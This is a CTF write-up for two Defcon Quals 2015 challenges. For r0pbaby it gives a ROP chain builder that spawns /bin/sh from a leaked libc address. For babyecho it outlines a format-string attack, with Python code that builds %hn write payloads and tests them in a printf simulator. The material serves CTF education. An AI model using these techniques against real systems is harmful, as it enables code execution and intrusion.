Defcon CTF Quals 2015 write-up

Hint: flag is not a frag: once you've got it, you can get one more...

r0pbaby.

Summary: binary with NX, libc address leakage, buffer overflow.

We used the following simple ROP gadget from __libc_system():

Alternatively, one could use a ROP chain such as the following, where every address is a fixed offset from the leaked address of system():

import struct

def build_chain(system):
    # `system` is the address of system() leaked from the target; the other
    # addresses are fixed offsets from it in this libc build.
    binsh  = system + 1271451   # "/bin/sh" string
    poprdi = system - 146214    # pop rdi ; ret
    poprsi = system - 138811    # pop rsi ; ret
    poprdx = system - 281266    # pop rdx ; ret
    execve = system - 234       # execve()

    p  = b'a' * 8                   # padding up to the saved return address
    p += struct.pack('<Q', poprdi)
    p += struct.pack('<Q', binsh)   # rdi = "/bin/sh"
    p += struct.pack('<Q', poprsi)
    p += b'\x00' * 8                # rsi = NULL (argv)
    p += struct.pack('<Q', poprdx)
    p += b'\x00' * 8                # rdx = NULL (envp)
    p += struct.pack('<Q', execve)  # execve("/bin/sh", NULL, NULL)
    return p

Result:

$ python r0pbaby.py 
cat /home/r0pbaby/flag
The flag is: W3lcome TO THE BIG L3agu3s kiddo, wasn't your first?

babyecho.

Summary: format string with input filtering, variable overwrite.

1) Leak the address of the input buffer on the stack through the format string;
2) Use a format-string write to overwrite the variable that holds the allowed input size, so that a longer input is accepted;
3) Put shellcode on the stack and overwrite the return address with the leaked buffer address.
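The leak and write primitives behind steps 1 to 3, as an added example (this is not the original babyecho.py, which the write-up does not reproduce): a builder for `%N$lx` leak and `%N$hn` write format strings, checked against a small model of printf. The stack layout (buffer at `%6$`), the addresses and the value written are constructed for the demo; the real challenge filtered the input, so the directive forms would have to be adapted, and this example assumes an unfiltered format string.

```python
import re
import struct

# One printf directive of the form %<pos>$<width><conv>; only the conversions
# the payloads below use are modelled.
DIRECTIVE = re.compile(rb'%(\d+)\$(\d*)(hn|lx|c)')


def build_leak_payload(arg_index):
    """Format string that prints the qword at positional argument `arg_index`."""
    return b'%%%d$lx' % arg_index


def parse_leak(output):
    """Turn the hex printed by build_leak_payload() back into an address."""
    return int(output.strip(), 16)


def build_write_payload(addr, value, buf_arg_index, fmt_width=64):
    """Format string that writes the 64-bit `value` to `addr` as four %hn shorts.

    Layout: [directives, padded with 'A' to fmt_width bytes][addr, addr+2, addr+4, addr+6]
    The pointers go last because their NUL bytes would otherwise terminate the
    format string. `buf_arg_index` is the positional index (%N$) of the first
    qword of our buffer, so pointer k is argument buf_arg_index + fmt_width/8 + k.
    """
    if fmt_width % 8:
        raise ValueError('fmt_width must be a multiple of 8')
    ptr_index = buf_arg_index + fmt_width // 8
    chunks = [(k, (value >> (16 * k)) & 0xffff) for k in range(4)]
    fmt = b''
    written = 0
    # Write the shorts in ascending order so the output count never has to wrap.
    for k, short in sorted(chunks, key=lambda c: c[1]):
        pad = (short - written) & 0xffff
        if pad:
            fmt += b'%%%d$%dc' % (buf_arg_index, pad)  # emit exactly `pad` bytes
            written += pad
        fmt += b'%%%d$hn' % (ptr_index + k)          # store low 16 bits of the count
    if len(fmt) > fmt_width:
        raise ValueError('directives do not fit in fmt_width')
    fmt = fmt.ljust(fmt_width, b'A')
    ptrs = b''.join(struct.pack('<Q', addr + 2 * k) for k in range(4))
    return fmt + ptrs


def load_buffer(args, buf_arg_index, payload):
    """Place the payload on the modelled stack as consecutive qword arguments."""
    payload = payload.ljust(-(-len(payload) // 8) * 8, b'\x00')
    for k in range(len(payload) // 8):
        args[buf_arg_index + k] = struct.unpack_from('<Q', payload, 8 * k)[0]


def simulate_printf(fmt, args, memory):
    """Minimal printf model: returns the output and applies %hn stores to
    `memory` (dict of address -> byte). Like C, it stops at the first NUL."""
    fmt = fmt.split(b'\x00', 1)[0]
    out = bytearray()
    i = 0
    while i < len(fmt):
        if fmt[i] != 0x25:                      # not '%': literal byte
            out.append(fmt[i])
            i += 1
            continue
        m = DIRECTIVE.match(fmt, i)
        if not m:
            raise ValueError('unsupported directive at offset %d' % i)
        idx, width, conv = int(m.group(1)), int(m.group(2) or 0), m.group(3)
        if conv == b'c':                        # width pads with spaces, at least 1 char
            out += b' ' * (width - 1) + bytes([args[idx] & 0xff])
        elif conv == b'lx':
            out += (b'%x' % args[idx]).rjust(width, b' ')
        else:                                   # hn: store count as 16-bit little-endian
            n = len(out) & 0xffff
            memory[args[idx]] = n & 0xff
            memory[args[idx] + 1] = n >> 8
        i = m.end()
    return bytes(out)


def read_qword(memory, addr):
    return sum(memory.get(addr + i, 0) << (8 * i) for i in range(8))


def demo():
    """Constructed run: buffer at %6$, a stack pointer at %7$ to leak, and a
    hypothetical 8-byte variable at 0x601040 to overwrite."""
    args = [0] * 32
    args[7] = 0x7ffd12345678                    # constructed: address to leak
    leaked = parse_leak(simulate_printf(build_leak_payload(7), args, {}))
    memory = {}
    payload = build_write_payload(0x601040, 0xdeadbeefcafebabe, 6)
    load_buffer(args, 6, payload)
    simulate_printf(payload, args, memory)
    return leaked, read_qword(memory, 0x601040)


if __name__ == '__main__':
    leaked, value = demo()
    print('leaked %#x, wrote %#x' % (leaked, value))
```

The same `build_write_payload()` serves step 2 (point it at the size variable) and step 3 (point it at the saved return address with the leaked buffer address as the value); on x86-64 the first stack qword is `%6$` because the first five variadic arguments live in registers.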

Result:

$ python babyecho.py 
...
The flag is: 1s 1s th3r3 th3r3 @n @n 3ch0 3ch0 1n 1n h3r3 h3r3? 3uoiw!T0*%